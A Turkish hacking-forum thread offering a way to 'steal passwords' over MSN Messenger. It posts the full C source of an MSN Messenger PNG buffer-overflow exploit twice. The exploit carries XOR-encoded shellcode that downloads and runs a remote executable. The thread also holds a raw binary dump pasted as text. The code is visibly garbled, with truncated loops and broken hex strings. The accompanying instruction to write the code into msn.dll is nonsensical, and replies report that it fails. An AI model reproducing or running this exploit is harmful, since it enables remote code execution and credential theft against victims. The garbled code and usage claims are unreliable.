MsN de göz kırpması İle şifre Çal...

hackerjimy

Özel Üye
15 Ağu 2007
1,340
34
C:\pagefile.sys@hacked_@
('binary' encoding is not supported, stored as-is) /*
*
* MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit
* Bug discoveried by Core Security Technologies ( www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: www.xteknik.com
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/


/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/


#include
#include
#include
#include



#ifdef __BORLandC__
#include
#endif


#define NOP 0x90


char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\ x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\ x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";


char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";


/* Generic win32 http download sh*llcode
xored with 0x1d by delikon ( http://delikon.de/) */
char sh*llcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\ x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\ x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\ x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\ x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\ x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\ x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\ x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\ x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\ x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\ xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\ xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\ xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";


FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newsh*llcode;


/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;iName=Name^xor;
return Name;
}



**** main(int argc, char *argv[])
{


if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit \n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");


return;
}



web = argv[2];



if( (di=fopen(argv[1],"wb" == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;ifputc(png_header,di);


/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);


weblength=(short int)0xff22;
pointer=strstr(sh*llcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newsh*llcode = new char[sizeof(sh*llcode)+strlen(web)+1];
strcpy(newsh*llcode,sh*llcode);
strcat(newsh*llcode,Sifrele(web));
strcat(newsh*llcode,"\x1d");


//sh*ll code
for(i=0;ifputc(newsh*llcode,di);



for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);


/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);


for(i=0;ifputc(pngeof,di);


printf("Vulnarable png file %s has been generated!\n",argv[1]);


fclose(di);
}


bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..


[EMAIL="Th€_ßy_P@Ş
 

hackerjimy

Özel Üye
15 Ağu 2007
1,340
34
C:\pagefile.sys@hacked_@
pardon arkadaşLar özür diLiyorum dll dosyasını hiçßir şekiLde açamıyoruz onu açmak için program aradım ama ßuLamadım ßuLurum die ßiLiyordum ama ßuLamadım...eğer dll dosyasını açaßiLirseniz ßu konu işinize yarayaßiLir...

https://tik.lat/1V5ab adresinden ßişeyLer anLayaßiLirim diyenLer warsa ßakaiLirLer...
 

FaTiH-68

Yeni üye
4 Ara 2007
15
0
Teşekkürler ÇoğunluK iŞe Yaramadığını Savunduğu iÇİn Denemeyeceğim Emeğe Saygı :)
 

RNBTEAM

Yeni üye
10 Ara 2007
7
0
('binary' encoding is not supported, stored as-is) /*
*
* MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit
* Bug discoveried by Core Security Technologies ( www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: www.xteknik.com
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/


/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/


#include
#include
#include
#include



#ifdef __BORLandC__
#include
#endif


#define NOP 0x90


char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\ x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\ x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";


char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";


/* Generic win32 http download sh*llcode
xored with 0x1d by delikon ( http://delikon.de/) */
char sh*llcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\ x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\ x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\ x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\ x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\ x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\ x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\ x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\ x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\ x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\ xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\ xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\ xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";


FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newsh*llcode;


/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;iName=Name^xor;
return Name;
}



**** main(int argc, char *argv[])
{


if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit \n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");


return;
}



web = argv[2];



if( (di=fopen(argv[1],"wb" == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;ifputc(png_header,di);


/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);


weblength=(short int)0xff22;
pointer=strstr(sh*llcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newsh*llcode = new char[sizeof(sh*llcode)+strlen(web)+1];
strcpy(newsh*llcode,sh*llcode);
strcat(newsh*llcode,Sifrele(web));
strcat(newsh*llcode,"\x1d");


//sh*ll code
for(i=0;ifputc(newsh*llcode,di);



for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);


/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);


for(i=0;ifputc(pngeof,di);


printf("Vulnarable png file %s has been generated!\n",argv[1]);


fclose(di);
}


bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..


Th€_ßy_P@Ş@

+Rep Please..........
....Alıntıdır....


Kod:
MZ&#144;ÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL5JEDà! @ ¾[ ` ¦l[O`°p € H.textÄ; @ `.rsrc°`P@@.reloc €`@B [H˜-Ô- P €¬P ¸kM† ¢uög“–…÷¡Øù}©Ö$e-ş³É&B6瞊2$øÕ¤ô¦Ù#ï¼ÅØŒ€©¨µíÓdç·41IûÔ„tm_Ñ”˜ıQØ[&)Ğ&#143;–ğ~yëtë™*­´õ døë3b³Z-Å{Õ ß £Ö7Ú0s ( ( *0ä~ ( ( o o 0+o Yo ( ( s rpo s s o! (" o# o$ o% s& o' o( s) s* s s o+ o, o- rpo. t oL ( *(/ *V(0 }}*{*{*V(1 }}*{*{*:(/ }*0\(/ {6}{-}{.} {4}{0} {5} } *{*{*{ *{ *{ *{*{ *:(0 } *{ *0«o&}-o(}.o,(5 ,o,o6 }1+ }1o.}2o0}3o*}6}9}4}/}0}5}8}7Ğ (7 (8 }:*0&#143;o}-o}.}/o }6o}4o}0o}5}2}3}1}9}7}8Ğ (7 (8 }:*:(/ }H*{B*r}B{I, {IoJ*{C*r}C{I, {IoJ*{H*v}H{I, {I@oJ*{D*r}D{I, {IoJ*{E*r}E{I, {IoJ*{F*v}F{I, {IoJ*{G*v}G{I, {I oJ*00 (2,$s; (2 (< o= o> o? *R}I{IoJ*"}I*(@ *b{S(A t }S*b{S(B t }S*b{T(A t }T*b{T(B t }T*b{U(A t}U*b{U(B t}U*b{V(A t}V*b{V(B t}V*b{W(A t}W*b{W(B t}W*š{N-s%}N{No5{N*¾{N, {No6}N{N, {No5*0Dş @€ {L,{Lo / ~C sD z(Ks *04r[p @€ {L,{Lo / ~C sD z*0, @€ {L, {Lo / ~C sD z*0n{Q-~C à&#129;sD z|O{;,#|O{;o 1~C á&#129;sD z{P.~C ß&#129;sD z|O};*0[{Q-~C à&#129;sD z|O{<,~C á&#129;sD z{P.~C ß&#129;sD z|O}<*0n{Q-~C à&#129;sD z|O{=,#|O{=o 1~C á&#129;sD z{P.~C ß&#129;sD z|O}=*0ˆ {No4 ,7 Ži11 _,+ @€ {L, {L o / ~C sD z{Ns&#129; @€ {L,{Lo / ~C sD z*07 @€ {L,{L{5o / ~C sD z*0d (E oF Ş&~C ç&#129;sD zt}K(G }M{Mt}L{KoŞ &(Mş*CKY D 0NşNsH (E ~JsI }R,"{T,{T~J oK Ş (UÜ(U*%@ š{R,{RoL }Rt&(M *"(M*j{S,{S~J oK *0z q q (Ks }P}Q|Oş|OĞ(7 (8 }A{U,{U{;soN }Q{O*0‹ q q (Ks }P}Q|Oş|OĞ(7 (8 }A{;s {W, {W oO }Q oP , }>{O*Æ{V,({Vq q (Ks soQ *0A {U,` {S,` {T,` {V,` {W,` *Ž{L,{M(R &}L}M*’,{R,{RoL }R(U*:(V(S * 0(VŞ (T Ü* . `ê€J*BSJB v2.0.50727ll#~Ø4#Strings '`#USl'#GUID|'X#BlobWÿ¶ ú3FWYBT ( }v„v ¤Ž´v¹vÃvÖv ì v#³ ¢ Á v vh X Ž ¹ Ž Ò Ž í Ž Ž !Ž :Ž YŽ vŽ ©&#141;Å&#141;Ôv ê=]{êŽêœê³êğ&#141;ê1vOEmv‰v· Ø ïX (X 6 E Z vŽ ”Ž È&#141;évı &#141;&#141;vœê²ê½êĞêv v2X YêªEηâEv#ê‹v&#157;vŸ ¢ v .BM^. {. ˜. &#157;. ¡´. Ä. Ï.Ú.í.#.-.; .B 7.BM.B%].J7BLBL—9 ²Íİè÷=LÅdV€Í9V€Õ9V€İ9V€ä9V€é9V€õ9V€ú9V€ÿ9V€ 9ÅdV€”V€F”V€{”V€«”V€Ë”ÅdV€Õ±V€ñ±V€ ±V€±V€7±ÅdV€SÄV€gÄV€|ÄV€šÄV€®ÄV€ÂÄV€ŞÄV€öÄV€Ä&7?MW_o{ƒ‘d˜d£d³ÄÅdÈÑdØãdú dÅd ²ğ ö )"—97&$ d? ZH ^T bc ep i€ &#143; m¹ p„ t{ t) ~p &#144;¥ ¢Æâ Ğ –ñô á ä!†<ì!†< "†S' "†c+"†< ("†S' 0"†…+ 8"ƒ< H"ƒ<A °"†I ¸"†' À"†!' È"†;' Ğ"†EN Ø"†S' à"ƒ`' è"†<X ÷"†±+ ƺ^ #ƒ<׸#ƒ<X€Æ ߀Æ. æ€ÆH ì€ÆR ߀Æ_ ô€Æm úÆ{ Æ„ Æ– ÿÆ­ Æà ÆÕ ÿS$†<b$†'j$†@*‡$†!'&#143;$†Q*¬$†I´$†k/Ò$†v5 Ú$†~: ÷$††'!ÿ$†–*!%†¦'"$%†²*"B%†¾@#J%†ËE#h%ƒØK$¤%ƒé^$¹%ƒö%Â%†<%Ê% †Î x%ã% †ä x&ü% †ı x'& † x(.& †= †)G& †U †*`& †~ ˜+y& †&#144; ˜,’& †¹ ª-«& †Ñ ª.Ä&†ì ´/ë&† ¹/'† +0l'†" '0¬'†1 *0ä'†@ 1`(†P X3È(†a 4D)ƒs ¿6Ø)ƒH Å7*ƒˆ Ì8¨*ƒ&#144; Ó;+&#129;Ÿ Ø<;+á­ =D+áà =`+á ÿ=è+á] ÿ?,áž A´,áÚ B-&#129; B%-&#129;2 ÓBJ-æ2 C\-Ä: CŒ-‘+6CÄØ ÄØlqlqqvqƒqŞqq n w }q „ „Š”qŠ&#157;¤¤¤¤¤¤¤ş¤¤¤¤¤¤¤¤¤¤¤¤l&#157;&#157;0&#157;³qƒÄ;§ÁÌ”Õ&#157;qÿ@i<q<*y<*&#129;<*‰ Denedim oLmadı Önemsiz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.